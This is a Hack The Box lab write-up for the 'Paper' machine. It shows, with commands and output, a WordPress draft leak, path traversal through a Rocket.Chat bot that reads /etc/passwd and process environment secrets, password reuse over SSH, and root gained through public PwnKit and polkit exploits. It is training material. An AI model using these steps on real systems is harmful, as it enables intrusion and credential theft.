Hack The Box - Paper

Posted on | In

000_info_card

User

Paper is an easy rated machine on HackTheBox created by secnigma. For the user part we will abuse an information leak through a CVE in wordpress to register an account in a rocket chat installation. In rocket chat a bot is vulnerable to LFI which gets us a password that is reused for the user dwight. In the root stage we will go over the unintended method of using pkexec and the intended one of abusing polkit to add another user with sudo rights and root the machine.

Nmap

As usual we start our enumeration with a nmap scan against all ports followed by a script and version detection scan against the open ones to get an initial overview of the attack surface.

All ports

1
2
3
4
5
6
7
8
9
10
11
$ sudo nmap -n -p- -T4 10.129.158.20
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-05 20:52 CET
Nmap scan report for 10.129.158.20
Host is up (0.028s latency).
Not shown: 65528 closed tcp ports (reset)
PORT      STATE    SERVICE
22/tcp    open     ssh
80/tcp    open     http
443/tcp   open     https

Nmap done: 1 IP address (1 host up) scanned in 1130.89 seconds

Script and Version

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
$ sudo nmap -n -sC -sV -p22,80,443 10.129.158.20
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-05 21:14 CET
Nmap scan report for 10.129.158.20
Host is up (0.033s latency).

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
|   2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA)
|   256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA)
|_  256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519)
80/tcp  open  http     Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-title: HTTP Server Test Page powered by CentOS
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
443/tcp open  ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Not valid before: 2021-07-03T08:52:34
|_Not valid after:  2022-07-08T10:32:34
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
|_http-title: 400 Bad Request
| http-methods:
|_  Potentially risky methods: TRACE
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  http/1.1

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.95 seconds

Wordpress draft

From the open ports http and https seem to be most promising. Opening port 80 in our browser we see the the Centos http server test page.

005_home

Intercepting a request in burp and looking at the response headers in repeater we can find that it leaks the vhost office.paper which we add to our /etc/hosts file.

010_vhost_leak

Opening http://office.paper in our browser we see a wordpress blog.

015_vhost_home

Scanning the page using wpscan we can identify the version to be 5.3 and thus out of date.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
$ wpscan --url http://office.paper/  -e u

...[snip]...

[+] WordPress version 5.2.3 identified (Insecure, released on 2019-09-05).
 | Found By: Rss Generator (Passive Detection)
 |  - http://office.paper/index.php/feed/, <generator>https://wordpress.org/?v=5.2.3</generator>
 |  - http://office.paper/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.2.3</generator>

...[snip]...

[i] User(s) Identified:

[+] prisonmike
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://office.paper/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] nick
 | Found By: Wp Json Api (Aggressive Detection)
 |  - http://office.paper/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] creedthoughts
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sat Feb  5 21:35:30 2022
[+] Requests Done: 58
[+] Cached Requests: 6
[+] Data Sent: 15.658 KB
[+] Data Received: 254.476 KB
[+] Memory used: 175.559 MB
[+] Elapsed time: 00:00:10

Checking for vulnerabilities in the installed version we find this describing an easy way to leak drafts. Using it as described with asc sorting it we get an error, however changing it to desc we get a draft leaking a rocket chat installation with the secret registration url.

020_wordpress_drafts

Rocket chat LFI

After adding chat.office.paper to our /etc/hosts aswell and opening the registration link in our browser we are able to register an account on rocket chat.

025_rocket_chat_register

Once logged in with the created account there is an interesting discussion in general where we see some bot functionality. Especially the file retrieval seems to be interesting.

030_rocket_chat_general

Starting a private conversation with the bot and testing if we can go back to the file system root with ../ it works and we are able to retrieve the /etc/passwd file.

035_recyclops_files

Checking the environment parameters of rocket chat with recyclops file ../../../../proc/self/environ we find the installation is running from the user dwight’s home directory and we also get the password.

040_rocket_chat_environ

Testing for password reuse over ssh we are able to log into the machine and grab the user flag.

1
2
3
4
5
6
7
$ ssh dwight@office.paper
dwight@office.paper's password:
Activate the web console with: systemctl enable --now cockpit.socket

Last login: Tue Feb  1 09:14:33 2022 from 10.10.14.23
[dwight@paper ~]$ wc -c user.txt
33 user.txt

Root

pkexec

Until some time after release there was an unintended way to obtain root abusing a vulnerable pkexec version. Checking for suid binaries we can see that pkexec is installed on the machine.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
[dwight@paper ~]$ find / -perm -4000 2>/dev/null
/usr/bin/fusermount
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/su
/usr/bin/umount
/usr/bin/crontab
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/at
/usr/bin/sudo
/usr/bin/fusermount3
/usr/sbin/grub2-set-bootflag
/usr/sbin/pam_timestamp_check
/usr/sbin/unix_chkpwd
/usr/sbin/userhelper
/usr/sbin/mount.nfs
/usr/lib/polkit-1/polkit-agent-helper-1
/usr/libexec/dbus-1/dbus-daemon-launch-helper
/usr/libexec/qemu-bridge-helper
/usr/libexec/cockpit-session
/usr/libexec/sssd/krb5_child
/usr/libexec/sssd/ldap_child
/usr/libexec/sssd/proxy_child
/usr/libexec/sssd/selinux_child
/usr/libexec/spice-gtk-x86_64/spice-client-glib-usb-acl-helper
/usr/libexec/Xorg.wrap

Retrieving it’s version we see it is vulnerable to the recent CVE-2021-4034.

1
2
[dwight@paper ~]$ pkexec --version
pkexec version 0.115

We can use this PoC to exploit pkexec and obtain root on the machine. Since make is installed on the machine we clone the repo tar it up and scp it to the target as dwight.

1
2
3
4
5
6
7
8
9
10
11
12
$ git clone https://github.com/luijait/PwnKit-Exploit
Cloning into 'PwnKit-Exploit'...
remote: Enumerating objects: 224, done.
remote: Counting objects: 100% (224/224), done.
remote: Compressing objects: 100% (224/224), done.
remote: Total 224 (delta 119), reused 4 (delta 0), pack-reused 0
Receiving objects: 100% (224/224), 64.38 KiB | 4.29 MiB/s, done.
Resolving deltas: 100% (119/119), done.
$ tar -czf PwnKit-Exploit.tar.gz PwnKit-Exploit
$ scp ./PwnKit-Exploit.tar.gz dwight@office.paper:/tmp
dwight@office.paper's password:
PwnKit-Exploit.tar.gz                                                                                                                                                                                        100%   92KB 791.0KB/s   00:00

There we unpack the archive and “make” the binary.

1
2
3
4
[dwight@paper tmp]$ tar -xf PwnKit-Exploit.tar.gz
[dwight@paper tmp]$ cd PwnKit-Exploit/
[dwight@paper PwnKit-Exploit]$ make
cc -Wall    exploit.c   -o exploit

Running the exploit we get dropped into a root shell.

1
2
3
4
5
6
7
[dwight@paper PwnKit-Exploit]$ ./exploit
Current User before execute exploit
hacker@victim$whoami: dwight
Exploit written by @luijait (0x6c75696a616974)
[+] Enjoy your root if exploit was completed succesfully
[root@paper PwnKit-Exploit]# wc -c /root/root.txt
33 /root/root.txt

Polkit

The actually intended solution to obtain root on the machine was to abuse polkit. Checking for the installed version we can see that it is vulnerable to CVE-2021-3560.

1
2
3
4
[dwight@paper ~]$ rpm -qa | grep -i polkit
polkit-0.115-6.el8.x86_64
polkit-pkla-compat-0.1-12.el8.x86_64
polkit-libs-0.115-6.el8.x86_64

Using the authors poc script we are able to create a new user with sudo rights and add the root flag to our collection. Note that this exploit is because of its time based nature not completely stable and might need rerunning until it works.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
[dwight@paper tmp]$ ./poc.sh -u=sm1l3z -p=sm1l3z

[!] Username set as : sm1l3z
[!] No Custom Timing specified.
[!] Timing will be detected Automatically
[!] Force flag not set.
[!] Vulnerability checking is ENABLED!
[!] Starting Vulnerability Checks...
[!] Checking distribution...
[!] Detected Linux distribution as "centos"
[!] Checking if Accountsservice and Gnome-Control-Center is installed
[+] Accounts service and Gnome-Control-Center Installation Found!!
[!] Checking if polkit version is vulnerable
[+] Polkit version appears to be vulnerable!!
[!] Starting exploit...
[!] Inserting Username sm1l3z...
Error org.freedesktop.Accounts.Error.PermissionDenied: Authentication is required
[+] Inserted Username sm1l3z  with UID 1006!
[!] Inserting password hash...
[!] It looks like the password insertion was succesful!
[!] Try to login as the injected user using sudo - sm1l3z
[!] When prompted for password, enter your password
[!] If the username is inserted, but the login fails; try running the exploit again.
[!] If the login was succesful,simply enter 'sudo bash' and drop into a root shell!
[dwight@paper tmp]$ su - sm1l3z
Password:
[sm1l3z@paper ~]$ sudo su

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for sm1l3z:
[root@paper sm1l3z]# wc -c /root/root.txt
33 /root/root.txt